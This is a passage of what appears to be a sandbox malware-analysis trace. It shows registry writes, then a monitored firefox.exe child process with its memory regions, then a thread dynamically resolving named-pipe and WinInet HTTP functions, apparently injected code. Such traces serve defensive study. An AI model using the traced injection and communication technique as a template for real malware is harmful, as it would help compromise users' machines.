phkResult=0x26f6fc, lpdwDisposition=0x26f858 | out: phkResult=0x26f6fc*=0x80, lpdwDisposition=0x26f858*=0x2) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x26f700*=0xe10, cbData=0x4 | out: lpData=0x26f700*=0xe10) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x26f700*=0x1, cbData=0x4 | out: lpData=0x26f700*=0x1) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x26f7a4*, cbData=0x58 | out: lpData=0x26f7a4*) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x26f7fc*, cbData=0x5c | out: lpData=0x26f7fc*) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0037.119] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0037.119] RegCloseKey (hKey=0x80) returned 0x0 [0037.120] HeapDestroy (hHeap=0x710000) returned 1 Process: id = "74" image_name = "firefox.exe" filename = "c:\\program files\\mozilla firefox\\firefox.exe" page_root = "0x7ef4f780" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xaac" cmd_line = "\"c:\\program files\\mozilla firefox\\firefox.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3259 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3260 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3261 start_va = 0x40000 end_va = 0x42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3262 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3263 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3264 start_va = 0xad0000 end_va = 0xb13fff entry_point = 0xad0000 region_type = mapped_file name = "firefox.exe" filename = "\\Program Files\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files\\mozilla firefox\\firefox.exe") Region: id = 3265 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3266 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3267 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3268 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3269 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3270 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3271 start_va = 0x6c0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3272 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3273 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3274 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3275 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3276 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3277 start_va = 0x700b0000 end_va = 0x7016dfff entry_point = 0x700b0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcr100.dll") Region: id = 3278 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3279 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3280 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3281 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3282 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3283 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3284 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3285 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3286 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3287 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3288 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3289 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3290 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3291 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3292 start_va = 0xb20000 end_va = 0x171ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3293 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3294 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3295 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3296 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3297 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3298 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3299 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3300 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3301 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3302 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3303 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3304 start_va = 0x700000 end_va = 0x9cefff entry_point = 0x700000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3305 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 3306 start_va = 0x74eb0000 end_va = 0x7504dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3307 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x3d0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3308 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3309 start_va = 0x75e00000 end_va = 0x75e1afff entry_point = 0x75e00000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3310 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3311 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 3312 start_va = 0x75ed0000 end_va = 0x75edafff entry_point = 0x75ed0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3313 start_va = 0x400000 end_va = 0x42bfff entry_point = 0x400000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 3314 start_va = 0x530000 end_va = 0x537fff entry_point = 0x530000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 3315 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x540000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 3316 start_va = 0x1730000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 3317 start_va = 0x74550000 end_va = 0x74570fff entry_point = 0x74550000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3318 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3319 start_va = 0x763a0000 end_va = 0x763e4fff entry_point = 0x763a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3320 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3321 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3322 start_va = 0x550000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3323 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3324 start_va = 0x9d0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 3325 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3326 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3327 start_va = 0x1a10000 end_va = 0x1b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a10000" filename = "" Region: id = 3328 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3329 start_va = 0x73750000 end_va = 0x737a1fff entry_point = 0x73750000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 3330 start_va = 0x73730000 end_va = 0x73744fff entry_point = 0x73730000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 3331 start_va = 0x74650000 end_va = 0x7465cfff entry_point = 0x74650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3332 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3333 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3334 start_va = 0x1850000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 3335 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3336 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 3337 start_va = 0x72f30000 end_va = 0x72f35fff entry_point = 0x72f30000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 3338 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3339 start_va = 0x1bb0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 3340 start_va = 0x74240000 end_va = 0x7424ffff entry_point = 0x74240000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3341 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 3342 start_va = 0x1cb0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3343 start_va = 0x1cb0000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3344 start_va = 0x1e50000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3345 start_va = 0x1e60000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 3346 start_va = 0x6f850000 end_va = 0x6f855fff entry_point = 0x6f850000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3347 start_va = 0x1d30000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 3348 start_va = 0x1e40000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3349 start_va = 0x1e60000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 3350 start_va = 0x748c0000 end_va = 0x748cffff entry_point = 0x748c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3351 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3352 start_va = 0x74890000 end_va = 0x748a1fff entry_point = 0x74890000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3353 start_va = 0x75960000 end_va = 0x7599bfff entry_point = 0x75960000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3354 start_va = 0x74880000 end_va = 0x74887fff entry_point = 0x74880000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3355 start_va = 0x754b0000 end_va = 0x754b4fff entry_point = 0x754b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3356 start_va = 0x75950000 end_va = 0x75955fff entry_point = 0x75950000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3357 start_va = 0x73fe0000 end_va = 0x74017fff entry_point = 0x73fe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3358 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3359 start_va = 0x2020000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 3360 start_va = 0x2060000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 3361 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3362 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3363 start_va = 0x70600000 end_va = 0x70659fff entry_point = 0x70600000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3364 start_va = 0x759a0000 end_va = 0x759b5fff entry_point = 0x759a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3365 start_va = 0x75740000 end_va = 0x7577afff entry_point = 0x75740000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3366 start_va = 0x75ec0000 end_va = 0x75ecdfff entry_point = 0x75ec0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3367 start_va = 0x2300000 end_va = 0x23fffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 3368 start_va = 0x6efd0000 end_va = 0x6efd7fff entry_point = 0x6efd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3369 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 3503 start_va = 0x73fc0000 end_va = 0x73fd1fff entry_point = 0x73fc0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3504 start_va = 0x74030000 end_va = 0x7403cfff entry_point = 0x74030000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3505 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3506 start_va = 0x75420000 end_va = 0x75428fff entry_point = 0x75420000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3507 start_va = 0x590000 end_va = 0x596fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3508 start_va = 0x5a0000 end_va = 0x5a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3509 start_va = 0x5b0000 end_va = 0x5b7fff entry_point = 0x5b0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 3517 start_va = 0x2490000 end_va = 0x258ffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 3518 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 167 os_tid = 0xedc Thread: id = 168 os_tid = 0xee0 [0053.577] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0053.577] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x77720000 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="realloc") returned 0x7772b10d [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="sprintf") returned 0x7773d354 [0053.577] GetProcAddress (hModule=0x77720000, lpProcName="srand") returned 0x7772f757 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="rand") returned 0x7772c070 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="_vsnprintf") returned 0x7772d1a8 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="strtok") returned 0x7772df1f [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="strcmp") returned 0x77738b11 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0053.578] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="CreateNamedPipeW") returned 0x7620270f [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileW") returned 0x7621cc56 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="SetNamedPipeHandleState") returned 0x7622f420 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="SetEvent") returned 0x7621bccc [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="GetOverlappedResult") returned 0x76212f04 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="ConnectNamedPipe") returned 0x76202727 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="FlushFileBuffers") returned 0x76207f81 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="DisconnectNamedPipe") returned 0x7622f438 [0053.578] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="OpenEventW") returned 0x7621548b [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="ResetEvent") returned 0x7621bcb4 [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemTime") returned 0x7621ced8 [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="ExitProcess") returned 0x7622214f [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="SetLastError") returned 0x7621bb08 [0053.579] GetProcAddress (hModule=0x761d0000, lpProcName="OutputDebugStringA") returned 0x7620eb36 [0053.579] LoadLibraryW (lpLibFileName="WinInet.dll") returned 0x76600000 [0053.588] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestExA") returned 0x76691812 [0053.589] GetProcAddress (hModule=0x76600000, lpProcName="HttpQueryInfoA") returned 0x7661a33e [0053.589] GetProcAddress 